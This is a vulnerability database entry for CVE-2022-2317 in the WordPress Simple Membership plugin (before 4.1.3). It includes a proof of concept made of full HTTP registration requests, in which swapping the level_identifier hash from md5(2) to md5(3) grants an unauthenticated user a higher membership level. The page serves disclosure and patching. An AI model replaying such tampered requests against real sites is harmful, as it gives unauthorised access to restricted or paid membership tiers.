Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:77B7CA19-294C-4480-8F57-6FDDFC67FFFB
HistoryJul 06, 2022 - 12:00 a.m.

Simple Membership < 4.1.3 - Unauthenticated Membership Privilege Escalation

2022-07-0600:00:00
wpscan.com
17

0.003 Low

EPSS

Percentile

68.8%

JSON

The plugin allows user to change their membership at the registration stage due to insufficient checking of a user supplied parameter. Note: This only affects membership from the plugin, not the WordPress role

PoC

The request contains the level_identifier parameter with the md5(2) value, where 2 is the default membership level. Value during registration - c81e728d9d4c2f636f067f89cc14862c An attacker can change this value and get a different membership level. Original request: POST /membership-join/membership-registration/ HTTP/1.1 Host: wordpress.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 281 Origin: http://wordpress.local Connection: close Referer: http://wordpress.local/membership-join/membership-registration/ Cookie: swpm_session=aa21a306ba6e73498ee136da0d751b47; swpm_in_use=swpm_in_use Upgrade-Insecure-Requests: 1 level_identifier=c81e728d9d4c2f636f067f89cc14862c&user;_name=user_low3&email;=user_low3%40jet.local&password;=user&password;_re=user&first;_name=user&last;_name=user&membership;_level=2&swpm;_level_hash=947098d78fd5617082ca190a28c163b0&swpm;_registration_submit=Register&action;=custom_posts Modified query, with which attacker can get the third level (level_identifier changed to md5(3)): POST /membership-join/membership-registration/ HTTP/1.1 Host: wordpress.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 281 Origin: http://wordpress.local Connection: close Referer: http://wordpress.local/membership-join/membership-registration/ Cookie: swpm_session=aa21a306ba6e73498ee136da0d751b47; swpm_in_use=swpm_in_use Upgrade-Insecure-Requests: 1 level_identifier=eccbc87e4b5ce2fe28308fd9f2a7baf3&user;_name=user_low3&email;=user_low3%40domain.local&password;=userpass&password;_re=userpass&first;_name=user&last;_name=user&membership;_level=2&swpm;_level_hash=947098d78fd5617082ca190a28c163b0&swpm;_registration_submit=Register&action;=custom_posts

CPENameOperatorVersion
simple-membershiplt4.1.3

Related

cve 1
wpexploit 1
prion 1
nvd 1
patchstack 1
cvelist 1
nessus 1
cve
cve
CVE-2022-2317
2022-08-01 13:15:11
wpexploit
wpexploit
Simple Membership < 4.1.3 - Unauthenticated Membership Privilege Escalation
2022-07-06 00:00:00
prion
prion
Design/Logic Flaw
2022-08-01 13:15:00
nvd
nvd
CVE-2022-2317
2022-08-01 13:15:11
patchstack
patchstack
WordPress Simple Membership plugin <= 4.1.2 - Unauthenticated Membership Privilege Escalation vulnerability
2022-07-07 00:00:00
cvelist
cvelist
CVE-2022-2317 Simple Membership < 4.1.3 - Unauthenticated Membership Privilege Escalation
2022-08-01 12:52:01
nessus
nessus
Simple Membership Plugin For WordPress < 4.1.3 Multiple Vulnerabilities
2023-10-05 00:00:00

0.003 Low

EPSS

Percentile

68.8%

JSON
Related for WPVDB-ID:77B7CA19-294C-4480-8F57-6FDDFC67FFFB
cve1wpexploit1prion1nvd1patchstack1cvelist1nessus1